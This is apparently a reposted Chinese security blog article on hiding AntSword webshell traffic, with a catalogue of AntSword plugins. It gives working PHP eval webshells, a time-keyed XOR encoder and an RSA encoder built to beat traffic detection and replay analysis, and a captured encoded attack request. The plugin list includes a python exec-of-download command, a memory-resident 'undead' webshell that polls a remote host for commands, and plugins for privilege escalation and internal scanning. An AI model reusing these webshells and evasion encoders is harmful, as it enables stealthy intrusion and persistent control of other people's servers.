T3lCOU95QWtZeUErSkhSdGNDQXlQaVl4SWlrN2FXWWdLR1psS0NkbGNuSnZjbDlzYjJjbktTa2dlMlZ5Y205eVgyeHZaeWdpWVNJc0lERXBPMzBnWld4elpTQjdiV0ZwYkNnaVlVQXhNamN1TUM0d0xqRWlMQ0FpSWl3Z0lpSXNJQ0l0WW5ZaUtUdDlmU0JsYkhObElIdHlaWFIxY200Z1JtRnNjMlU3ZlNSdmRYUndkWFFnUFNCQVptbHNaVjluWlhSZlkyOXVkR1Z1ZEhNb0pIUnRjQ2s3UUhWdWJHbHVheWdrZEcxd0tUdHBaaUFvSkc5MWRIQjFkQ0FoUFNBaUlpa2dlM0J5YVc1MEtDUnZkWFJ3ZFhRcE8zSmxkSFZ5YmlCVWNuVmxPMzE5Y21WMGRYSnVJRVpoYkhObE8zMDdablZ1WTNScGIyNGdjblZ1WTIxa0tDUmpLWHNrY21WMFBUQTdKR1E5WkdseWJtRnRaU2drWDFORlVsWkZVbHNpVTBOU1NWQlVYMFpKVEVWT1FVMUZJbDBwTzJsbUtHWmxLQ2R6ZVhOMFpXMG5LU2w3UUhONWMzUmxiU2drWXl3a2NtVjBLVHQ5Wld4elpXbG1LR1psS0Nkd1lYTnpkR2h5ZFNjcEtYdEFjR0Z6YzNSb2NuVW9KR01zSkhKbGRDazdmV1ZzYzJWcFppaG1aU2duYzJobGJHeGZaWGhsWXljcEtYdHdjbWx1ZENoQWMyaGxiR3hmWlhobFl5Z2tZeWtwTzMxbGJITmxhV1lvWm1Vb0oyVjRaV01uS1NsN1FHVjRaV01vSkdNc0pHOHNKSEpsZENrN2NISnBiblFvYW05cGJpZ2lDaUlzSkc4cEtUdDlaV3h6WldsbUtHWmxLQ2R3YjNCbGJpY3BLWHNrWm5BOVFIQnZjR1Z1S0NSakxDZHlKeWs3ZDJocGJHVW9JVUJtWlc5bUtDUm1jQ2twZTNCeWFXNTBLRUJtWjJWMGN5Z2tabkFzTWpBME9Da3BPMzFBY0dOc2IzTmxLQ1JtY0NrN2ZXVnNjMlZwWmlobVpTZ25jSEp2WTE5dmNHVnVKeWtwZXlSd0lEMGdRSEJ5YjJOZmIzQmxiaWdrWXl3Z1lYSnlZWGtvTVNBOVBpQmhjbkpoZVNnbmNHbHdaU2NzSUNkM0p5a3NJRElnUFQ0Z1lYSnlZWGtvSjNCcGNHVW5MQ0FuZHljcEtTd2dKR2x2S1R0M2FHbHNaU2doUUdabGIyWW9KR2x2V3pGZEtTbDdjSEpwYm5Rb1FHWm5aWFJ6S0NScGIxc3hYU3d5TURRNEtTazdmWGRvYVd4bEtDRkFabVZ2Wmlna2FXOWJNbDBwS1h0d2NtbHVkQ2hBWm1kbGRITW9KR2x2V3pKZExESXdORGdwS1R0OVFHWmpiRzl6WlNna2FXOWJNVjBwTzBCbVkyeHZjMlVvSkdsdld6SmRLVHRBY0hKdlkxOWpiRzl6WlNna2NDazdmV1ZzYzJWcFppaG1aU2duWVc1MGMzbHpkR1Z0SnlrcGUwQmhiblJ6ZVhOMFpXMG9KR01wTzMxbGJITmxhV1lvY25WdWMyaGxiR3h6YUc5amF5Z2taQ3dnSkdNcEtTQjdjbVYwZFhKdUlDUnlaWFE3ZldWc2MyVnBaaWh6ZFdKemRISW9KR1FzTUN3eEtTRTlJaThpSUNZbUlFQmpiR0Z6YzE5bGVHbHpkSE1vSWtOUFRTSXBLWHNrZHoxdVpYY2dRMDlOS0NkWFUyTnlhWEIwTG5Ob1pXeHNKeWs3SkdVOUpIY3RQbVY0WldNb0pHTXBPeVJ6Ynowa1pTMCtVM1JrVDNWMEtDazdKSEpsZEM0OUpITnZMVDVTWldGa1FXeHNLQ2s3SkhObFBTUmxMVDVUZEdSRmNuSW9LVHNrY21WMExqMGtjMlV0UGxKbFlXUkJiR3dvS1R0d2NtbHVkQ2drY21WMEtUdDlaV3h6Wlhza2NtVjBJRDBnTVRJM08zMXlaWFIxY200Z0pISmxkRHQ5T3lSeVpYUTlRSEoxYm1OdFpDZ2tjaTRpSURJK0pqRWlLVHR3Y21sdWRDQW9KSEpsZENFOU1Day9JbkpsZEQxN0pISmxkSDBpT2lJaU96dDlZMkYwWTJnb1JYaGpaWEIwYVc5dUlDUmxLWHRsWTJodklDSkZVbEpQVWpvdkx5SXVKR1V0UG1kbGRFMWxjM05oWjJVb0tUdDlPMkZ6YjNWMGNIVjBLQ2s3WkdsbEtDazc%3D&s01f4f3921efb4=bf&x7121316358fb9=A0Y21k

流量完全混淆

将流量进行两次base64解码即可得到原本数据

基于时间基于时间的动态密钥编码器

'use strict';
//基于时间的蚁剑动态秘钥编码器
//link :https://yzddmr6.tk/posts/antsword-xor-encoder/
//code by yzddmr6
/* 服务端
<?php
date_default_timezone_set("PRC");
@$post=base64_decode($_REQUEST['yzddmr6']);
$key=md5(date("Y-m-d H:i",time()));
for($i=0;$i<strlen($post);$i++){
    $post[$i] = $post[$i] ^ $key[$i%32];
}
eval($post);
?>
*/
module.exports = (pwd, data, ext={}) => {
function xor(payload){
let crypto = require('crypto');
Object.assign(Date.prototype, {
switch (time) {
let date = {
"yy": this.getFullYear(),
"MM": this.getMonth() + 1,
"dd": this.getDate(),
"hh": this.getHours(),
"mm": this.getMinutes(),
"ss": this.getSeconds()
            };
if (/(y+)/i.test(time)) {
                time = time.replace(RegExp.$1, (this.getFullYear() + '').substr(4 - RegExp.$1.length));
            }
Object.keys(date).forEach(function (i) {
if (new RegExp("(" + i + ")").test(time)) {
if (RegExp.$1.length == 2) {
                        date[i] < 10 ? date[i] = '0' + date[i] : date[i];
                    }
                    time = time.replace(RegExp.$1, date[i]);
                }
            })
return time;
        }
    })

let newDate = new Date();
let time = newDate.switch('yyyy-MM-dd hh:mm');
let key = crypto.createHash('md5').update(time).digest('hex')
    key=key.split("").map(t => t.charCodeAt(0));
//let payload="phpinfo();";
let cipher = payload.split("").map(t => t.charCodeAt(0));
for(let i=0;i<cipher.length;i++){
        cipher[i]=cipher[i]^key[i%32]
    }
    cipher=cipher.map(t=>String.fromCharCode(t)).join("")
    cipher=Buffer.from(cipher).toString('base64');
//console.log(cipher)
return cipher;
  }

  data['_'] = Buffer.from(data['_']).toString('base64');
  data[pwd] = `eval(base64_decode("${data['_']}"));`;
  data[pwd]=xor(data[pwd]);

delete data['_'];
return data;
}

此编码器的作用是将时间的md5值设置为key进行异或操作通过base64传输,shell获取到编码后的数据时先base64解密后再通过时间的md5进行一次异或解密得到明文

对应的webshell

<?php 
header('HTTP/1.1 404');
class COMI { 
    public $c='';
    function __destruct() {
        return eval(substr($this->c, 0));
    }
}
date_default_timezone_set("PRC");
$comi = new COMI();
$password = &$password1;
$password1 = $_REQUEST['x'];
$post = &$password;
$post=base64_decode($post);
$key=md5(date("Y-m-d H:i",time()));
for($i=0;$i<strlen($post);$i++){
    $post[$i] = $post[$i] ^ $key[$i%32];
}
$lnng1 = &$lnng;
$lnng = $post;
$lnng2 = $lnng1;
@$comi->c = substr($lnng2, 0);
?>
b581dec526a568=EYY2QgL2QgIkQ6L3BocHN0dWR5X3Byby9XV1cvcGlrYWNodS92dWwvdW5zYWZldXBsb2FkL3VwbG9hZHMiJndob2FtaSZlY2hvIGYwNDI5OWUmY2QmZWNobyAxODI2MWM4ZGY4OTM%3D&n08d50c7fefb55=4AY21k&u909700452f2fe=xp&x=UhUHDk1aBBEEDwZpUVcBDVJXThUwJFpDUTIMGT49ZV5%2BDjQSBgsnEThhXlBvaigbVAEsTSgKQVF5DnQKLzFAcFRRMFI9CzcSA25kUFd1DhZXajdYLCBdAXojDBQ%2BIlhIZzYkEgdVCQQ7C2QGfnEoFFV1MEI5UXxeU1ZjCAU9fVh8NxISP1ECCQMKcF1UaisSf3oVXANReAVqIAQIBT1%2BRG40Vw4uezcENAlkZWNZNDFhSyxjMFJ8fGUiZwU2Dlh8ZTZTIDFtMAs5alkBf3VbFW9qLE4xO3RPajNRBQdWdkJWOzcNPFUjGDttawZtADAObwBfXDswUV9kLEVTKyANQXgnVgsuaxIJAwpwXVRqKxJ5AiRfAg18XlUyDBQAPXpefCA0FAZ%2FIxsCUEVdVwAsUWxxHk0EO3hQalZjUzxWZl1VOyQEP38JGyp6WUZ6ADgUVV8wXzhRUVl6IwwUPT1%2BSH4kIBgsezcSBX5kQn5hIFVXZT9YKDZ0RlNVDFAHCFgBbjQsET9rAgkAYWBaV2EJElMAKEEDDWRGUgpjDytWBAZ9KzQWP38JGzFqYEZRdTQWelsvQS0JewJ%2BHmxTPiF5BHkZKwsqCCcWAAtgRlZbBQlSdVdcADt%2FRn9WWQ4vJnJwbQ4KET9uXA4Efl5MUXovDXx6NEM7JFpPezdZVD1XDURTJAoXAW8wVQdqYAZXZTASVVhXTjs0cEVTI3NTBSZTWlMkVwkEYCwSLglwXFR1MBJVWwFcBSQHXVE8fBMrVXZBVQ4KBAYKM1IqenhAVnU0F24ALF8CUWBdUTx8CigmdVh7ClILLmwWCTgLBwZsaigbZmckQAIOYFhoV3sUBiJYAXwgLxQ9fh0BOXFKVXlLWgt6cTQHAzRkRlMNXlQ%2BCA1IfCA0EjVsJFUrflkOVgAOVGxlX1oqIGRcUgpnCwcLfUF4GjQSLkEWEgQJcFxUdTASVVsBXi0KAl97MEFaK1V2QVUOCgQGCjNSKnp4QFZ1NBduACxfAlFgXVE8fAooJn1HfgoNVTRwLxY7fl5PfnEwUlRlNEcCCl0BaQp%2FDz0yRwZRNxJbKkIRDwVuB1xRdQ4UVFskXwJRYENpHVIIBlZiAXw7Egk8YDcOOQtgWm9fJFNUejRRBSRaQmo8RRUGCGJXVFEwUi57LzM0Un9ffmYRCVcAMAIxNAddfjddCD09Zl18ICw4KW9VFjt6cH96XwkLeno0RwM0Y1l7N14TK1duR1QKAQkEbFUVLkBgRmV6LFJVXx5bAwpRXVJXY1MvMUdaVjAVEC5gFgkDCmQGYkswEm5hJw4oIGRAVDxnAS4iWFV%2BJVIFL38RDgRvQV1UYTcYe15WAAc7fFpULGMaBgx2cG4OIBg%2FbDxSOQtkQ2wAWwlsYQFcA1BgBnswQVorV24AVQ4oUgRvXBcofnRMVwE0UlV6MAcqIFoBeiMMUgAtdgBTJ1cUPFRcDDthYFBsAFsXUnUwQgUre1l7MEEVPQkNXVUONAQ8Ch0OOG4GWX5mFg5vAA5BKCB8Wn0zZFM9D31YewovFSgKKBgvU39fegA0CFd1XlAwJHBMajMACS8mZkdTOzQVAWA0Ei4LZFxUdVoFf1gFBigKAl99IHxQLQ9ACFVRLAQGCzcKAldjWX5mFlJVXAoAKyt3D2kJcxk%2BMW0Bb1E0DjwKXAk7alpMUWUoGFJ6L1grJQ9nZFV7NjMcfkR6Jw4JK2wnCC8LaFpvXytTeGEsUy0nf0Z7MEYIBx8FWG47KA4rUjcEO35kXFcAMA59eigGOA14BlMNUgg8VHZhYlI0ACxVLFMufXRdb2UvU3tYPF8vN28CeQgFECkMX0F4GjQOB1Y%2FGAVxew9kdSgKVQAzBS8lD11qM3sVPiJhXlRQMAsGCzcbKnpgUGB3WzZgdBVeBTddQX8wVhQpIWUAeg4%2FGz9VMAs5akVPfmEJVXx1Nw47JFpPUglzFz42U1pvUigkMFQ%2FJDRVQV9gAiwxZWQkYjlTbHxkIWMsNTAFd34PVhIqQTcIMWF8B2xcLFJVWwFcOyBBQXwgcBM0MQRYexovTSxRVAgof0VfUEswGFBkEV4oCVlffFZ4BDwmfgZ9KyhbPXssCy4LXlt%2BeixTb1woBwIKUV1qJ0IUKCFxQWc3VgspQSwSBAlwQVFqMA5UXD9YKA90dGYhUlotDAFfbTs0DgdWPA0oVXB0Y3cFC31hUl4uCg8HU1d8FQYiDVtuNBEUBgovEgNTXUBRaiwbegAeQThRcEV8Vn8TBg9bR1M7KBspCysLAG4GAHkBNBhVW19eADQCAHxXewoFMgAHe1EsEgdRLBIuCgNaV3osDlMCJEAFO2RaUgpsDC0JdnNhJgFbLFFQDDthYFpXXDsNf14kdTcmUV97NwEKK1V5B3tSAhIHVTcUBQp%2FQFYBDhhSdTBDLBl%2FAWEeWhUyV1hEbSRfUQZBXDYEYXxuYQMBUHh2EnMuCg9uUTMACAZWUEt4UytUKQkBEgNUYEBRAS8UYwEKTQUkYEJ9HnwVMldYRG0kX1EGCScUBQtkT2AACg5UdRFBBQlzQ30nDVQtDF8GUTQKDy57Iw4DYXAGUGEFCWxlUwUCUGRPezdZVC4iYkRTDiAbBlJUDgRxcEVXADAOfXEsDwcrTl5TVk0TBghiCVErEQspeyQJO24HBFYBMBt9ZhJaA1B8WmkzewwvJmZdVQ08CgZWLAU4YX9Rf3o7En96Ekc7CndZeTNjFwctZgR8IDRQLmsOBQQJcEFRajAOVFw%2FWAJQZE9oV38PByJMWW5RMw0sVh1aB350TFQANFdQeh4PKApBUXkOBQooJnVaUwoNEioLVFsHamBPZWEoVXx6JA4oK0VdaVcFCitXbgBVDihSBG9cFyh%2BaFp%2BcTAPfWoVXDsnB1pVLHcQBldmXXwgLxEsUR0jAG4HRm0ABg5ScQFeOyRaTGkzfxA%2BMw1cUzRTCAF%2FCRQDV39ffmEJVVdlP1g7NAdBVCxeDC4iZUF8OxUJP3xUCgJXeF5QYQUSeQFXWwMreFpVHWcINDJySFQOIFc9ClQKAnpVWFF6KBJUYQVEODt8T2k8WQUGMnJGfCACGAFwL1IDC0pAUQA0G3xLEVw7IF1Gf1cEGj49ZgBUDlINP1YzFzgKYEZXAFcEbGoORwJQZEx7J2cOLzZtXFY7KAQ8CiMRA350X1d1Nw18dT9HKwpvXlEzAAU9PX5IbjsNDS9%2FPBErfmNGfmYWW3kAPAYDDngGUTMMFi0tfgBVDSgNP28dEQILWkBsABENfHU3RCggZFx7N3dUBTJtVnwrKFM8VitSAlBVXW9xFQV7cRFQLDBdUWAwBQQtDAxYfiA%2FDyx%2FPw4qelZBUWowDlRcP1kqMHdbeg10DD4IYV59UTAbBlVcGzkLSkBvSwESf3oeDygkbFp7J1EXPTJYQn0aDRIuaydVAG5rUX56LFJVXCgHAgpeT2ozcwgGIlhEVhoBCykKLxIDUAtMVHErEnpxJ144DnBMUSd8Ey0mcQh%2BJjwgMX4rJCpqcAF%2FejAWVXEnDigrZFpSPHcWPTIEXlRQChg9CgEOBX8LBm9lUxVuADRHAgpRRnwndA09PXlffDcSFQFgNw4DV2tZfF4gK2N0X3o1U0EPeydeBAEcdgV4GiRbKkEkCThAcx1%2FejAWVXEnTjEKb055DV5UBTJtVnwkPA4uewEOAld4QFZeWxFUAAVZKjBdUVVWYxoHCA1Ib1EeFD9BAgs4antFfHYnEnkBVlA7NE5Majd3VAYyckFVIAELPG0kGixTUUN4cVYVelgjXi0gd195DUIELQx9Qn4gLxY8VjwLKm1GD1NhIA5UeihbKCtCT2o8Z1IHCABWZQ4gEQYKMFUHamBAUWowFVJqN1AxMHR3aglZED4zDV9tOzQEPApcFwV%2BZENRei8NfHo0QwIgXQFhLGMWBiJYRFYaAQkBf1QVKm1GRm9bIw18dV8GBSt0B1QndAs0NnVYfgoNBQALJxsAbgcGfnEwFFJqNEAFO2dGf1d%2FDwAtYkhVCiQ3BlYzDi4KAw9WXzRSUmosQigmbF5SLHsPK1YEBm0NMBc8CzcSAwsGUVZcNBdvAFdcKiBkXHs8RggHCGIBZzcnVS9%2FNFs7fl5PV18kFmxhAVw5UnhwZQhvJTEJR1hiUygxNm4nNzkJaHxhdzQtZ2dXcSgPBkZ%2FVlkOLyJuXXwgAhgAYCtSO24CWH5hDlVneigCAlBkWlI3Ugg9HENaVA4wUi5sEVs7bkpMb2UOD311PFsqIFJBaTx7GQAiXEhTMAUSLmARIwJ%2BdExWATANVVwzWCske0V6LH8PACZfBlE0MBEGCjMSO1BaW29hBQxVAA5bAyROUGo8XQ89HFdBfDsSFQZVCRcFelp3VgAKDlR1HlE7O15aaR1SCD0cX0F4UFcOB3ArDgBua1lvXzcNfAAwAzs0e1h7N1lUNSJiBW00Kw0vfygRK34KRX96KA5ScQ0AAit8RlIKZAwFCA1BVQoBCyZRLBErfgpGfmYWW2xlHk07NFpbeyNvDy8mUEZVUCQOB1EGEiphQV1vXCNbZ3okQQIkYEN7J2cJKCZQSH0aDVUBCg0SA35nWXxnIA9sZV9aKiBkW1MnXhMBVnZIVjRTUi59Jw87C2QGVksFCWxcJ0QsCXcGfydeEytWBXBUJCgRBwsrDip6YFtWcQlVUGUwRAJRYEZqDV0OPjZTX1QrLBQ8CVwUAn5kQ39LCRJTSzRAKCcGUWEsdxoGV3pXVVAkDgdRAgk4QEVRbGooG29qDVgsMHcPYA13CwcLfllSMAEMBn8JFTtqUUV8cQZRfEsNRCgnf1FgMAEEPT1%2BSG47DQ0vCycSAn5nWHlxIwxSSwVHKjBBUXojWRUvMUACViQKET9rAgowfmhaVwA7DXx1CkE2GXBSezdZVActfkFVDTcNNH8%2FDDthYEx%2BcTASVAMVTzkwQU99IGRXLzZfBlE7Ag0Ebx0OKnp0d29fNBRsWwFcADQPVH0IBRMvPUBGVA4KFwF7DSM7VFZaUXovDXx1CkE2GXxSfCB8FCohU0F8NxJbNH8%2FCAN%2BC0xvYQUJV2VfVSw1BkZ%2FVHcOPVdMR1RRMw0vfwkUNkN4Un5mFiNVeixBOFIPXFIjDBk%2BNlNaVCANVQNvMxECC2RGb1sKD2xhAVk4NAMGU1dZGQAiYkV9Gg0SAAgnCgNXYExQaixSbGVWWCske0Z%2FVwQPBi16XVY0Pw0GVjMXAgtaWld1GhhXdV9dABpRXWonQgQuInlBfDAkVQZVM1IFYXhDfHEwG2xqNwAHNGBFU1ZjEz4MXEtTNCwYAXAsDSt%2BY0V4cRUafWEjDigKDl95J2wOLSB2W1UkIBgGCVwOBH5eTFF6Lw1%2FWShnNTB%2FRns8RggAHwVEbTsFBTQIXCwqelZuYAAsG1dqJActDXhZajNNEC4cXwZ9JDNbL3AGFjFUZAJvZS8NfHUrRy4aZExSHgUIPjYEGmJQNAkxCzNSKnpZAX96KA5ScVIOKyt4QHwwADA%2BMnJaZjQeES57DlUrcXxaZWEwDnpmU2MFJGRwUwp8DC8xR1pUDjBSKVJVCQILZ0JlXigOb2U0dQMkQVl7MEEUBwhYRFMgAQkGVTNSKm1GD29lGhhsahVcAg5gBnkgBQQpMX0CeFBXGz9gN1MCVAZRf3ooDlJ2Eg4uGmRPajxkWjUtfgBVDigWP3sCCQJQBl98ditJfFgjXio3QkFTCVkWACZ1Xn0rLA4BeyBbLHpZGXxcKA5SdlcAKyt8WlQsBQorDH1YeBkSWzwKI1I4C1VZZ2oKCGxqJAcANA9DeSdnDy89QF1uUQ4ULHsvJDRVeGZgWA0UeksvQiskY0JgCVEPACAFXVRQKAo%2FCjANKm1GD3oAJBhUATAHAitgBnsnXlQ%2BIlhdfCANVUcRTFk%3D

此时已经检测不出什么敏感流量

并且使用基于时间混淆的好处在于如果在后期想要利用重放来得到这段代码执行的操作也是不可实现的,因为对应的时间已经不一致了,这样一来便彻底无法知道该段代码的具体操作是什么。

RSA编码器

蚁剑版本高于2.1的才支持针对php的RSA算法

RSA的思路也就是利用非对称加密的方式,先用私钥将传输的内容进行加密,然后传输给shell后,shell通过公钥进行解密,从而实现对流量的混淆,RSA的实现原理在这里不再叙述,但是使用RSA编码器需要前提条件,也就是需要开启openssl模块

/**
 * php::RSA编码器
 * Create at: 2021/03/02 15:27:33
 */

'use strict';

/*
 * @param  {String} pwd   连接密码
 * @param  {Array}  data  编码器处理前的 payload 数组
 * @return {Array}  data  编码器处理后的 payload 数组
 */
module.exports = (pwd, data, ext={}) => {
  data["_"] = `if((time()-${parseInt((new Date().getTime())/1000)})>5){die();};${data['_']}`;
let n = Math.ceil(data['_'].length / 80);
let l = Math.ceil(data['_'].length / n);
let r = []
for (var i = 0; n > i; i++) {
        r.push(ext['rsa'].encryptPrivate(data['_'].substr(i * l, l), 'base64'));
    }
    data[pwd] = r.join("|");
delete data['_'];
return data;
}
data["_"] = `if((time()-${parseInt((new Date().getTime())/1000)})>5){die();};${data['_']}`;

在编码器中加入此代码,来设置数据的时效性。过了5秒后该数据失效,变为die

蚁剑的流量混淆和插件合集

 

蚁剑插件介绍

蚁剑的流量混淆和插件合集

将插件目录拷贝至 antSword/antData/plugins/ 目录下即安装成功

  • as_bypass_php_disable_functions

    突破 disable_functions 执行系统命令,绕过 Open_basedir 等安全机制

  • AS_BugScan

    创建 BugScan 节点插件,通过 WebShell 创建BugScan节点

    使用

    在终端下直接输入 python -V 如果有输出,你可以继续进行,如果提示找不到 python, 请先将 python 添加至环境变量中。

    访问 BugScan 进入扫描器。点击添加任务,在节点子栏下获取你个人的创建节点链接。

    假如在页面显示的为:

       python -c "exec(__import__('urllib2').urlopen('http://t.cn/Rqu1SmB?xxxxxxx').read())" -m 5

    那么在本插件 URL 部分应该填写 urlopen 函数部分中的 URL:

       http://t.cn/Rqu1SmB?xxxxxxx

    最大任务数` 输入框中控制一个节点能接受的最大目标数,默认为 5

    点击开始即可尝试创建 BugScan 节点。创建成功后,在 BugScan 添加任务页面即可看到你的节点。

    1. 虚拟终端下检查 Python2.7 是否在环境变量中

  • as_jwtdebugger

    AntSword JWT 调试插件

  • as_messycoderecover

    尝试恢复乱码, 并非所有乱码都可以被完美恢复,乱码中的问号说明该字符已经丢失,是无法恢复的

  • as_netstat

    AntSword 查看网络连接状态插件

  • as_plugin_godofhacker

    黑客神器,谁用谁知道!

  • as_plugin_import_shell_from_csv

    从 CSV 中 批量导入 Shell

  • AS_Redis

    AntSword Redis 管理插件, 需要 AntSword >= 2.0.3

  • as_scanwebshell

    通过正则匹配,查找后门 webshell

  • as_webshell_venom

    webshell-venom 蚁剑版

  • check_rwx-suid

    1、在目标服务器上查询可读可写可执行目录以及可用于suid提权的文件(支持windows环境下的asp,aspx以及linux环境下的php)

    2、asp以及aspx类型的shell以上传独立的detect.asp(x)文件来实现对应操作(点击"用户"按钮后会弹出确认框,确认后即可在服务器上生成此文件),生成成功后只需访问webshell目录下的detect.asp(x),输入欲检测的范围并执行即可

  • GenShell

    AntSword 生成 Shell插件,根据用户输入密码或随机产生密码,生成 Shell

  • inject_und3ad

    向目标服务器植入不死php webshell

    点击左上角远程文件按钮,输入远程控制文件地址以及轮询时间(以秒为单位),点击确定即可(分隔符为###)

    For example : http://192.168.134.128/1.txt###60   每60秒轮询一次http://192.168.134.128/1.txt里的内容

    文件内容类似于 file_put_contents('./1.php','<?php @eval($_POST[xxy]); ?>);  (密码可自定义,路径也可自定义,此文件内容旨在每隔一段时间写入一个小马)

    上述旨在利用php特性植入不死webshell,在执行完成后,此webshell会基于用户设置的轮询时间向用户设置的远程文件地址发送请求,用户只需在远程地址的txt文档中输入想要执行的命令即可。

    此webshell在执行后会自身删除,驻留内存之中,无文件残留

    清除办法包括重启web服务等

    用户在植入不死webshell后,远程控制文件地址将会被记录,在第二次打开此界面时会在下方"历史远端控制文件"中看见

  • LiveScan

    AntSword Webshell存活弹出插件

    1、通过请求 Webshell 并判断返回数据是否一致判断 Webshell 是否存活

    2、仅对 PHP,ASP,ASPX 有效

    3、一键将失联的 Webshell 移动到 [.Trash]分类

    4、一键清空[.Trash]分类

  • PortScan

    AntSword 端口扫描插件,通过 WebShell 对内网中的服务器的指定端口进行扫描

  • SuperTerm

    AntSword 创建交互式终端插件,通过 WebShell 创建一个交互式终端

  • ExecScript

    AntSword 执行自定义脚本,在目标主机上执行php、asp、aspx 自定义的脚本


插件:

链接:https://pan.baidu.com/s/1w3fW4721OALvClGoULSc3g
提取码:0117

蚁剑的流量混淆和插件合集

原文始发于微信公众号(深度网络安全实验室):蚁剑的流量混淆和插件合集【武装 启动!】

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月28日13:45:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   蚁剑的流量混淆和插件合集https://cn-sec.com/archives/1994206.html

发表评论

匿名网友 填写信息